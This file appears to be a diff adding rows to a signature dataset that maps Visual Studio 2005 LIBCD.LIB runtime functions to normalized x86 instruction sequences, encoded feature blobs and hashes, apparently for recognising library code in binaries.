+__aulldiv,"DIV R32\nMOV R32,R32\nMUL DWORD PTR SS:[ESP+CONST]\nMOV R32,R32\nMOV R32,DWORD PTR SS:[ESP+CONST]\nMUL R32\nADD R32,R32\nJCC CONST",gktfFIJLXxRQuNDwIYd5Y3WBokOchlE4nIZROHWBokOHR1I/nIZROIdHUj8hh3ljULjQ8IdHUj+chlE4h0dSP3WBokMAAAAAdYGiQ7YU/3IAAAAAbMNFZaN6Gjugedeuo3oaO4JLXxQAAAAAthT/cgAAAAAAAAAAoHnXrrYU/3IAAAAA,[],293f78ad4f5b0faeaf915cd5afce0e7d4f3f9c43,VS2005,LIBCD.LIB
+_WinMainCRTStartup,"PUSH CONST\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],0\nCALL CONST\nCALL DWORD PTR DS:[0]\nMOV DWORD PTR DS:[0],R32\nCALL CONST",qvPN8+0WVUoAAAAAN2mzuOnJoC2q883zkkc/p+nJoC2q883z7RZVSgAAAAAAAAAA6cmgLQAAAAAAAAAA3B+M85JHP6c3abO4,[],6eef160eff21601438f494aca9398efdad23171d,VS2005,LIBCD.LIB
+_putc,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST",jc0jjAAAAAAAAAAA,nIZROORSvJ+S9NEBdYMGr5yGUTgNCHgU5FK8n5yGUTgNCHgUkvTRAeRSvJ91gwavxbOaZpk9lOYAAAAADQh4FON7O4zFs5pm43s7jJk9lOYAAAAAmT2U5gAAAAAAAAAAt5wE4+RSvJ+S9NEB,ecbf48519510b8087b8a3a1b0a6178d2893b9988,VS2005,LIBCD.LIB
+_fputc,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nPUSH R32\nPUSH R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",DQh4FON7O4zFs5pm43s7jJk9lOYAAAAAmT2U5gAAAAAAAAAAt5wE4+RSvJ+S9NEBnIZROORSvJ+S9NEBdYMGr5yGUTgNCHgU5FK8n5yGUTgNCHgUkvTRAeRSvJ91gwavxbOaZpk9lOYAAAAA,[],997800b1d06d6e008989c3a2517953c5941009af,VS2005,LIBCD.LIB
+_labs,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",rf0audUc1LYAAAAA1RzUtgAAAAAAAAAAcVqUOtUc1LYAAAAAjLRRTq39GrlxWpQ6,[],7e2da614291832dd64d6a2f7f8b1e36c43b256bb,VS2005,LIBCD.LIB
+__locking,"MOV R32,DWORD PTR SS:[EBP+CONST]\nSAR R32,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nMOV R32,DWORD PTR DS:[R32*4]\nMOVSX R32,BYTE PTR DS:[R32+R32*8+CONST]\nAND R32,CONST\nTEST R32,R32",rydXXE+LzAoAAAAAdvz6pl6jgyechlE4nIZROPQp7gichlE4nIZROF6jgyechlE4nIZROJZz8F/0Ke4InIZROAfvgh1eo4Mn9CnuCDqNu5cAAAAAXqODJ5yGUTgAAAAAB++CHTqNu5cAAAAA7bLtN+ikXWgGYojDlnPwXzqNu5cAAAAAOo27l9KzGgbSsxoGBmKIw3AwqL3opF1o0rMaBl6jgycAAAAAnIZROCbu4WWchlE4nIZROMCHr/ichlE4nIZROJ+/4/nAh6/4wIev+MSSpmgAAAAA6KRdaE+LzAoAAAAAn7/j+cSSpmgAAAAAXqODJ5yGUTgAAAAA0rMaBpyGUTh2/PqmxJKmaE+LzAoAAAAAcDCovZyGUTivJ1dcJu7hZU+LzAoAAAAAT4vMCgAAAAAAAAAA,[],727823fcca4ee5003917fe0b9c8b97dcc4fed71e,VS2005,LIBCD.LIB
+__wexecv,"PUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nPOP R32",O4+r5eRSvJ8AAAAA5FK8nyEgQSWchlE4nIZROORSvJ+S9NEBO4+r5eRSvJ8AAAAA5FK8nwj62ERlaGAnkvTRAeRSvJ87j6vlZWhgJwAAAAAAAAAArKbWTpyGUTgAAAAAO4+r5eRSvJ8AAAAA5FK8n5yGUTiDrkNenIZROORSvJ+S9NEBg65DXuRSvJ+S9NEBkvTRAeRSvJ87j6vlkvTRAeRSvJ87j6vlO4+r5eRSvJ8AAAAA5FK8n5yGUTghIEElO4+r5eRSvJ8AAAAAISBBJeRSvJ+S9NEBCPrYRORSvJ+S9NEBkvTRAeRSvJ87j6vl5FK8n4OuQ14I+thEkvTRAeRSvJ87j6vl,[],da43d8a5b949d578b0dd44e3dfdb9a8a3deef07e,VS2005,LIBCD.LIB
+__splitpath,"MOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nMOV R8,BYTE PTR DS:[R32]\nXOR R32,R32\nMOV R8,BYTE PTR DS:[R32+CONST]\nAND R32,CONST\nTEST R32,R32\nJCC CONST",T4vMCgAAAAAAAAAAac0GAJyGUTh25RRmlnPwX5SUNckAAAAAlJQ1yV6jgycAAAAAduUUZpyGUTichlE4bUkFBl6jgyf4d/nBvDjyKpSUNckAAAAAyFJf116jgycAAAAA+Hf5wV6jgycAAAAAnIZROJyGUThrv25knIZROBQkdL/u+9p0a79uZJZz8F+8OPIqnIZROJyGUTichlE47vvadBQkdL8AAAAAyFJf116jgycAAAAAnIZROHFalDrbMO2EFCR0v6QXY28AAAAAXqODJ0+LzAoAAAAAnIZROJyGUTjbMO2E2zDthJZz8F+8OPIqlnPwX5SUNckAAAAAPsqG2aQXY28AAAAAvDjyKpSUNckAAAAAXqODJz7KhtkAAAAAlJQ1yZyGUTgAAAAAvDjyKpSUNckAAAAApBdjb5yGUTh33LbYB/gElJyGUTgUcroElnPwX5SUNckAAAAAd9y22G1JBQbIUl/XlnPwX5SUNckAAAAAlJQ1yXFalDoAAAAA2zDthJZz8F+8OPIqlJQ1yZyGUTgAAAAAnIZROF6jgydrv25ka79uZJZz8F+8OPIqbUkFBshSX9dtSQUGcVqUOmnNBgAAAAAAFHK6BJyGUTichlE4yFJf1xQkdL8AAAAAnIZROMhSX9fQa/y0nIZROE+LzAru+9p0vDjyKpSUNckAAAAAnIZROGnNBgDu+9p0bUkFBm1JBQbIUl/X0Gv8tMhSX9cAAAAA7vvadE+LzAoAAAAA7vvadGnNBgAAAAAA,[],7bd15c94327135c6a59765dc52460ce5e5561631,VS2005,LIBCD.LIB
+__wstrdate,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL DWORD PTR DS:[0]\nMOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST",VoEbCgAAAAAAAAAA,[],d9b6602305ce1c6bca1c31049f852c5e6f9e9310,VS2005,LIBCD.LIB
+_atan2,"PUSH DWORD PTR SS:[EBP+CONST]\nCALL CONST\nADD ESP,CONST\nWAIT\nFSTCW WORD PTR SS:[EBP+CONST]\nCALL CONST\nCALL CONST\nPOP R32",zm5U+AAAAAAAAAAAgL+herC5Og4AAAAAIYd5Y85uVPhkZzDaZGcw2gAAAAAAAAAA/MSgqvzEoKoAAAAAsLk6DiGHeWOEZCGP/MSgqoC/oXoAAAAAhGQhjwAAAAAAAAAA,[],863d1a02c8433e93b1c60cf98f53d197c2b37645,VS2005,LIBCD.LIB
+__CIatan2,"PUSH DWORD PTR SS:[EBP+CONST]\nCALL CONST\nADD ESP,CONST\nWAIT\nFSTCW WORD PTR SS:[EBP+CONST]\nCALL CONST\nCALL CONST\nPOP R32",zm5U+AAAAAAAAAAA/MSgqrC5Og4AAAAAIYd5Y85uVPhkZzDaZGcw2gAAAAAAAAAAsLk6DiGHeWOEZCGPhGQhjwAAAAAAAAAA,[],7cc84f8b7ab66c897d04eefeb321a4f800365b34,VS2005,LIBCD.LIB
+_fmod,CALL CONST\nWAIT\nFSTSW R16\nWAIT\nSAHF\nJCC CONST,XG9a9iQDw53udxjT/MSgquSUb/wAAAAA7ncY0wAAAAAAAAAA5JRv/P5SkXaxde5HJAPDnf5SkXaxde5HsXXuR1xvWvYAAAAA/MSgqvzEoKoAAAAA/lKRdiQDw53udxjT,[],05d483e48e8cd9a2eb87d535c3e31efe2f3d6853,VS2005,LIBCD.LIB
+__CIfmod,"PUSH EBP\nMOV EBP,ESP\nADD ESP,-2A0\nPUSH R32\nPUSH DWORD PTR SS:[EBP+CONST]\nPUSH DWORD PTR SS:[EBP+CONST]\nCALL CONST\nADD ESP,CONST",/MSgquX01PsAAAAA5fTU+wAAAAAAAAAA,[],de9e8356a5c960fc4f28cf139d40caec697dde09,VS2005,LIBCD.LIB
+__gcvt,"MOV R32,DWORD PTR SS:[EBP+CONST]\nMOVSX R32,BYTE PTR DS:[R32]\nMOV R32,DWORD PTR SS:[EBP+CONST]\nADD R32,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nTEST R32,R32\nJCC CONST",yFJf121JBQYAAAAAbUkFBjHZM/vIUl/Xt3alk0H2oGkFn879BZ/O/aQXY28AAAAApBdjbzHZM/ttSQUG1RzUtgAAAAAAAAAAyFJf16QXY28AAAAAQfagaYg7HL34vsJ7RvT3gNUc1LZeo4MnpBdjb4g7HL34vsJ7I5df8gWfzv23dqWTXqODJ0b094AAAAAAiDscvdUc1LakF2NvbUkFBkb094DIUl/X+L7Ce4g7HL3IUl/XyFJf16QXY28AAAAAMdkz+21JBQYAAAAA,[],8fa4aa30b403881e97080bcf6d84ee40c0367cbd,VS2005,LIBCD.LIB
+___getlocaleinfo,"PUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nXOR R32,R32\nJMP CONST",Auh/9CmTkDA1FnITJAPDnXszdqgdnm4nrydXXE+LzAoAAAAAac0GACSjmVzFFanWHZ5uJ4sNFEwAAAAANRZyE5yGUTgAAAAAXqODJ5yGUTgAAAAA3RsV1RxQkfpeo4MnKZOQMJbrBFo1FnITxRWp1pT1PsmvJ1dcXqODJw3MwAEAAAAANRZyEw5C2wgAAAAADczAAU+LzAoAAAAAxPCtWWnNBgDnIisEJKOZXE+LzAoAAAAAT4vMCgAAAAAAAAAA5yIrBN0bFdUC6H/0NRZyE5yGUTgAAAAAXqODJ5yGUTgAAAAAHFCR+mZ5MTVgUfMAlusEWnVPmjU1FnITezN2qF6jgye2isw5rydXXE+LzAoAAAAAlPU+yX5GQ3QAAAAAYFHzAE+LzAoAAAAANRZyE5yGUTgAAAAAdU+aNd0bFdVeo4MnDkLbCH5GQ3QAAAAAZnkxNU+LzAoAAAAAnIZROK8nV1yPuGMmiw0UTF6jgye2isw5j7hjJq8nV1wAAAAAfkZDdA3MwAEkA8OdtorMOTUWchMAAAAA,[],ea9c3896dce7281eed3bd57a8a355af497cc6dcd,VS2005,LIBCD.LIB
+__wspawnv,"PUSH CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST\nCALL CONST\nADD ESP,CONST\nCMP R32,CONST",kvTRAeRSvJ91gwavlinN6wAAAAAAAAAAs1oPwORSvJ+S9NEBdYMGr5yGUTiDrkNe5FK8n5yGUTiDrkNenIZROORSvJ+S9NEBg65DXuRSvJ+S9NEBkvTRAeRSvJ91gwavkvTRAeRSvJ91gwavdYMGr5yGUTghIEEl5FK8n5yGUTghIEEldYMGr4OuQ14I+thEISBBJeRSvJ+S9NEB5FK8n4OuQ14I+thECPrYRORSvJ+S9NEBkvTRAeRSvJ91gwavkvTRAeRSvJ87j6vldYMGryEgQSWchlE45FK8nyEgQSWchlE4nIZROORSvJ+S9NEBO4+r5eRSvJ8AAAAA5FK8nwj62ESWKc3r,[],0e8743b0727c6e2356adc89ef2479c183da21504,VS2005,LIBCD.LIB
+___crtCompareStringW,"MOV R32,DWORD PTR SS:[EBP+CONST]\nSUB R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nTEST R32,R32\nSETGE R8\nDEC R32\nAND R8,CONST\nADD CONST2,CONST",9CnuCMuCy5UAAAAAnIZROD73NQ0NzMABqaiwi8uCy5UAAAAADczAATEuOrEAAAAAPvc1DU+LMHgNzMABZnkxNTEuOrEAAAAAN5GsfOfdfUtmeTE15919S5yGUTgAAAAAy4LLlTEuOrEAAAAAGaZm/5yGUTgAAAAAJAPDndFIlKUkPsFMJD7BTDEuOrEAAAAAZnkxNTEuOrEAAAAALaOCjZyGUTiXAE6QlwBOkGZ5MTUZpmb/nIZROJyGUTjeJIIpDczAATEuOrEAAAAAT4sweDEuOrEAAAAA3iSCKZyGUTjeJIIpZnkxNTEuOrEAAAAA5919S5yGUTgAAAAAnIZROJyGUTjeJIIp0UiUpSbu4WWchlE43iSCKUGNfBuchlE4Ju7hZTEuOrEAAAAAnIZROD73NQ1meTE1MS46sQAAAAAAAAAAnIZRODeRrHwJ4QexlwBOkJcATpAZpmb/ZnkxNTEuOrEAAAAACeEHsefdfUtmeTE1nIZROEGNfBuchlE4Pvc1DTeRrHxmeTE1ZnkxNTEuOrEAAAAAN5GsfOfdfUtmeTE1nIZROCQDw51BjXwbQY18G6mosIv0Ke4IGaZm/5yGUTgAAAAA,[],96b1b8d7e1ab55b72ebd57bf23653680f5e8cfd3,VS2005,LIBCD.LIB
+__ismbcalnum,"MOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nXOR R32,R32\nMOV R16,WORD PTR DS:[R32*2+CONST]\nAND R32,CONST\nTEST R32,R32\nJCC CONST",oDc6oU+LzAoAAAAAJElloJZz8F/0Ke4IlnPwX0FF0BsAAAAAEuWMr5Zz8F8kSWWg9CnuCKA3OqEAAAAAQUXQG0+LzAoAAAAAT4vMCgAAAAAAAAAADczAAU+LzAoAAAAAmdT0gGs/0wRmeTE1Umd/BpZz8F8e0JUBlnPwX6A3OqEAAAAA9CnuCEFF0BsAAAAASsDrlhLljK+Z1PSAHtCVAZZz8F/0Ke4IZnkxNU+LzAoAAAAAaz/TBFJnfwYNzMAB,[],d3caead63d12205cac06e6dd64d57e38403a8887,VS2005,LIBCD.LIB
+__creat,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST",1vvU4QAAAAAAAAAA,Elr+TgAAAAAAAAAA,06217e198d45677fcc922450b668fd1de11e2942,VS2005,LIBCD.LIB
+??_Gexception@@UAEPAXI@Z,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST",Ji2KbzF9NgCfv+P5n7/j+TF9NgAAAAAAMX02AAAAAAAAAAAA,[],26b9eafd4b7bce0ad688e787c1af5db0aed964ee,VS2005,LIBCD.LIB
+??0exception@@QAE@XZ,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR DS:[R32],0\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR DS:[R32+CONST],0",mkqKQQAAAAAAAAAA,[],e83fbf4e8238fedce958e084ba40487c95cb625c,VS2005,LIBCD.LIB
+??0exception@@QAE@ABV0@@Z,"MOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[R32+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nADD R32,CONST\nPUSH R32\nCALL CONST",Jj8LAl6jgydXPcYIXqODJzF9NgAAAAAAgEplWTF9NgAAAAAAVz3GCF6jgycAAAAAMX02AAAAAAAAAAAA+HqVnoBKZVkmPwsC,[],7d0d7473e65c114b195cf6cf8f711d7471a5e922,VS2005,LIBCD.LIB
+??1exception@@UAE@XZ,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR DS:[R32],0\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCMP DWORD PTR DS:[R32+CONST],0",jUyfvk+LzAoAAAAAT4vMCgAAAAAAAAAAj+s7c0+LzAqNTJ++,[],ebcf5abb85ab4ae8eb1ef68f1157a5cd86fd3257,VS2005,LIBCD.LIB
+??0exception@@QAE@ABQBD@Z,"MOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[R32]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[R32+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST",mPgKvBe5DiXXG1DM1xtQzAAAAAAAAAAAF7kOJQAAAAAAAAAA,[],a3ea70b1aa9e397eab15fc553fe45bfefa1ba39d,VS2005,LIBCD.LIB
+?what@exception@@UBEPBDXZ,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCMP DWORD PTR DS:[R32+CONST],0\nJCC CONST",T4vMCgAAAAAAAAAA/Iq5Gk+LzAoAAAAA55xsSyqzQt78irkaKrNC3k+LzAoAAAAA,[],cdab259d1b7385fb345cae094b2050c0b6b2adfe,VS2005,LIBCD.LIB
+??4exception@@QAEAAV0@ABV0@@Z,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCMP R32,DWORD PTR SS:[EBP+CONST]\nJCC CONST",Xvkl4DF9NgAAAAAAcYZkIjF9NgBe+SXgMX02AAAAAAAAAAAA,[],ab144448b3ae16a4e24b9c803e7cebdc82a5a882,VS2005,LIBCD.LIB
+_wcsxfrm,"MOV R32,DWORD PTR SS:[EBP+CONST]\nSUB R32,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST",CZfunCCxMyfaN+dTXqODJwP8GHoAAAAASv/IwpIitRc1FnIT9CnuCF6jgycAAAAAkiK1F/Qp7gjp1YFmcv8ZO0r/yMKrfkj0g65DXiCxMyfaN+dTNRZyEwP8GHoAAAAAyFJf1wP8GHoAAAAAA/wYegAAAAAAAAAA2jfnUwmX7pwAAAAAILEzJwAAAAAAAAAA6dWBZshSX9f0Ke4I9CnuCIOuQ14AAAAAT4vMCgAAAAAAAAAAq35I9E+LzAoAAAAA,[],56dbe6d0f9d79cb03ba54d050d16af22714b2946,VS2005,LIBCD.LIB
+_fputs,"PUSH CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST\nCALL CONST\nADD ESP,CONST\nCMP R32,CONST",LsWwVwAAAAAAAAAAma5ZK5yGUTgAAAAAnIZROORSvJ+S9NEBO4+r5eRSvJ8AAAAA5FK8n5yGUTichlE4kvTRAeRSvJ87j6vlnIZROORSvJ+S9NEBO4+r5eRSvJ8AAAAA5FK8n5yGUTguxbBXkvTRAeRSvJ87j6vl,[],802bc4245cc88b64fc81b4ac24596b13985bd91a,VS2005,LIBCD.LIB
+__NMSG_WRITE,"LEA R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nADD R32,CONST\nCMP R32,CONST",28KjsSUCAlpo1qJRm46yj8Sg0gkAAAAAXqODJxZ7h1AAAAAAWXA4v5uOso8kA8OdJuQBqiQDw51ZcDi/JAPDnZuOso8kA8Od0d+5AJq3Mc/bwqOxFnuHUMSg0gmLDRRMxKDSCQAAAAAAAAAAJQICWsSg0gkAAAAAJAPDnX5GQ3QkA8OdnIZROBZ7h1DjMNBo3EdD7pyGUTgAAAAAmrcxzyUCAlpo1qJRaNaiUcSg0gkAAAAA4zDQaF6jgydeo4MnJAPDnX5GQ3SbjrKPfkZDdMSg0gnR37kAXqODJ9TZ7ssAAAAAiw0UTCQDw50m5AGq1NnuyxZ7h1DjMNBo,[],9d3c1f6773c66d1b80c10d47cff632787c47d36d,VS2005,LIBCD.LIB
+__FF_MSGBANNER,"CALL DWORD PTR DS:[0]\nPUSH CONST\nCALL CONST\nADD ESP,CONST\nPOP EBP\nRETN",ZQ5YNwAAAAAAAAAAoT/8tWUOWDe/FkKgOWijNKE//LUkA8OdAOHWawAAAAAAAAAAJAPDnQDh1mskA8OdvxZCoAAAAAAAAAAAJAPDnQDh1muhP/y1,[],bdaed96ad12555b8b2a40a9734daf4b4ea959984,VS2005,LIBCD.LIB
+__GET_RTERRMSG,"MOV R32,DWORD PTR SS:[EBP+CONST]\nADD R32,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],CONST\nJCC CONST",T4vMCgAAAAAAAAAAXqODJ9TZ7ssAAAAA4zDQaOq2imzzzO/J1Nnuy+Mw0GjjMNBonIZROOMw0GjjMNBo4zDQaF6jgydeo4Mn88zvyU+LzAoAAAAAojkvFZyGUTgAAAAA6raKbAAAAAAAAAAAXqODJ+Mw0GgAAAAA,[],06c58c440112ef8cbe340cbf90cf51ad702d3113,VS2005,LIBCD.LIB
+??3@YAXPAX@Z,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nPUSH R32\nPUSH R32\nPUSH R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",O4+r5eRSvJ8AAAAAa11M0z7Khtleo4MnxKDSCQAAAAAAAAAAKdmrsORSvJ+kRfSD5FK8n6RF9IO8Z5e4kvTRAeRSvJ87j6vlXqODJ8Sg0gkAAAAAPsqG2aRF9IMAAAAAvGeXuMSg0gkAAAAApEX0g+RSvJ8p2auwKdmrsORSvJ+S9NEBpEX0g+RSvJ8p2auw,[],6b0e7f3afe63b9a4aa7511b58a1dd9c3972cbad5,VS2005,LIBCD.LIB
+__realloc_base,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",cVqUOgAAAAAAAAAAz8bsr5yGUTi64Jsk+Hf5wQAAAAAAAAAADczAAU+LzAoAAAAAtcXF1l6jgyechlE4NRZyE8/G7K8AAAAAuuCbJJyGUTjuiKz+T4vMCgAAAAAAAAAAcVqUOrXFxdYAAAAA1C1vJkZNTkVxWpQ67ois/pyGUThJ8xGZXqODJ5yGUTgAAAAAnIZROBN+wvJWcd50SfMRmU+rzBxxWpQ6nIZRONUr2sjFgurOVnHedJyGUTgAAAAAxYLqzl6jgyfULW8mRk1ORV6jgyechlE4E37C8pyGUTgAAAAA1SvayF6jgyfULW8mVaatKJyGUTiVl7ZIcVqUOpyGUTgAAAAAT6vMHJyGUTjULW8mlZe2SE+LzAoAAAAAnIZROF6jgyechlE4nIZROKA3OqEkA8OdnIZROM/G7K87k3ky1C1vJvh3+cFxWpQ6JAPDnS8CckKgNzqhO5N5Mk+LzAoAAAAAoDc6oU+LzAoAAAAALwJyQjUWchMNzMAB,[],b9c557712055022edfb389e66fbe6ce0cb35bbb3,VS2005,LIBCD.LIB
+_asctime,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],0\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[R32+CONST]\nIMUL CONST2,CONST2,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32",Wc7yogAAAAAAAAAAc8IbWwc7NkEAAAAAndPoWpyGUTgAAAAABzs2QVnO8qJzwhtbnIZROFnO8qJzwhtb,[],4a010ae752b2f6e24767e0efc831051ea1553aaf,VS2005,LIBCD.LIB
+__wsystem,"PUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nNEG R32\nSBB R32,R32\nINC R32",nIZROIxaEeT0Ke4I7jk0/SEgQSWchlE4QwUjg8Sg0gkAAAAAhuhq9sSg0gkAAAAAxKDSCQAAAAAAAAAAoDc6ocSg0gkAAAAA3/GpXqA3OqEkA8Od9CnuCMuCy5UAAAAAsPrhbYboavb0Ke4IISBBJeRSvJ+S9NEBJAPDnbD64W2gNzqhjFoR5MuCy5UAAAAAJAPDnbD64W0kA8OdO4+r5eRSvJ8AAAAA5FK8nyEgQSV2o4DfkvTRAeRSvJ87j6vl9CnuCEMFI4MAAAAAdqOA37D64W3f8aley4LLlcSg0gkAAAAA,[],de60d941487d66ad7d7ea4d82525d24f523a5190,VS2005,LIBCD.LIB
+_qsort,"MOV R32,DWORD PTR SS:[EBP+CONST]\nSUB R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nDIV DWORD PTR SS:[EBP+CONST]\nADD R32,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],CONST\nJCC CONST",YQchddTZ7stlMdLCYQchdQ7f5JBsT22VZTHSwqNMMcEAAAAAuwpj+BilXqvn8cqWZaZVTBilXqvl2NSB1Nnuy0+LzAqc/mVoMbv6YTUWchOchlE4PsFBttTZ7stlMdLC5/HKlvaD0iNeo4MnnP5laKNMMcEAAAAAnIZROJVH46M1FnITXqODJz7tbjMAAAAADt/kkF6jgyca72UONRZyE0+LzAoAAAAAlUfjo6NMMcEAAAAAGu9lDqNMMcEAAAAAXqODJ9TZ7ssAAAAADt/kkGEHIXU+wUG2Pu1uMw7f5JBhByF1T4vMCgAAAAAAAAAAfuD/CRilXqvl2NSB9oPSI37g/wkAAAAAbE9tlV6jgyca72UOo0wxwWWmVUyujQFO5djUgX7g/wkYpV6rro0BTtTZ7ssAAAAAGKVeq+fxypa7CmP4,[],3fe1779fe741a944c3b511f34d694aa6b197b17a,VS2005,LIBCD.LIB
+__CItan,"SUB ESP,CONST\nFST QWORD PTR SS:[ESP]\nCALL CONST\nCALL CONST\nADD ESP,CONST\nRETN",2jyUmAAAAAAAAAAA,dqHX0LygXegBoXWzvKBd6AAAAAAAAAAAAaF1swAAAAAAAAAA,6c52c281985b6103670d322a91d32196ce78ce3a,VS2005,LIBCD.LIB
+_tan,FLD TBYTE PTR DS:[0]\nFXCH ST(1)\nFPREM1\nWAIT\nFSTSW R16\nSAHF\nJCC CONST,LLApNwVtZtAR3zjE0UiUpXtGESB7RhEgAFkkeehVq9qc7n8w6FWr2jfULVPNLBGmBW1m0CywKTeC5sMaEd84xIp8rQWKfK0F0UiUpYp8rQWKfK0FinytBQVtZtAAAAAAzSwRpjfULVOQ4qERe0YRIAAAAAAAAAAALLApNyywKTeC5sManO5/MCywKTeP65fekOKhEXtGESB7RhEggubDGtFIlKUAAAAAj+uX3gVtZtAR3zjEN9QtU9FIlKUAAAAA,[],16d36899b4e207d1914d8618223ed54205368aa8,VS2005,LIBCD.LIB
+_strerror,"MOV R32,DWORD PTR DS:[0]\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[R32*4]\nPUSH R32\nPUSH CONST\nCALL CONST\nADD ESP,CONST",aHKH3AAAAAAAAAAAcVqUOvsPa/QAAAAAjLRRTmhyh9zuiKz+7ois/mhyh9xxWpQ6+w9r9AAAAAAAAAAA,[],a3e1c010acb79b31c1a5d62b49e5f992f7e36c35,VS2005,LIBCD.LIB
+__wcsnicoll,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST",DczAAU+LzAoAAAAAJgwaito3INomTrz7JAPDnSYMGood0S+s2jcg2k+LzAoAAAAAJk68+0+LzAoAAAAAT4vMCgAAAAAAAAAAHdEvrE+LzAoAAAAAjLRRTiQDw50NzMAB,[],3d2976320f20af2d2d2501d8c2e4208f044bb2bb,VS2005,LIBCD.LIB
+_memchr,"PUSH R32\nMOV R32,R32\nSHL R32,CONST\nADD R32,R32\nMOV R32,R32\nSHL R32,CONST\nADD R32,R32\nJMP SHORT CONST",hHCHHQF5m4HYzQSm2M0EpgF5m4HLaBJKy2gSSgF5m4HYzQSm2M0EpgeTNdJeo4MnuxTn/Lu2XCxcpTmJXqODJ7u2XCwAAAAAB5M10gAAAAAAAAAAZ7q8DQAAAAAAAAAAAXmbgQAAAAAAAAAAAcDPEADh1mu7FOf8AXmbgQAAAAAAAAAAXKU5iWe6vA2X2nuUAXmbgQAAAAAAAAAAl9p7lADh1mtY2ig6WNooOlylOYm7tlwsu7ZcLLu2XCyweoZ5sHqGeRqNz30AAAAAz3PioQDh1mtcpTmJu7ZcLADh1mtcpTmJXKU5iWe6vA2X2nuUl9p7lFylOYkA4dZrAOHWawAAAAAAAAAAu7ZcLM9z4qEajc99Go3Pfbu2XCyEcIcd,[],d967950e3e2b2273e8c8cd9091e6a7c2760e6e0d,VS2005,LIBCD.LIB
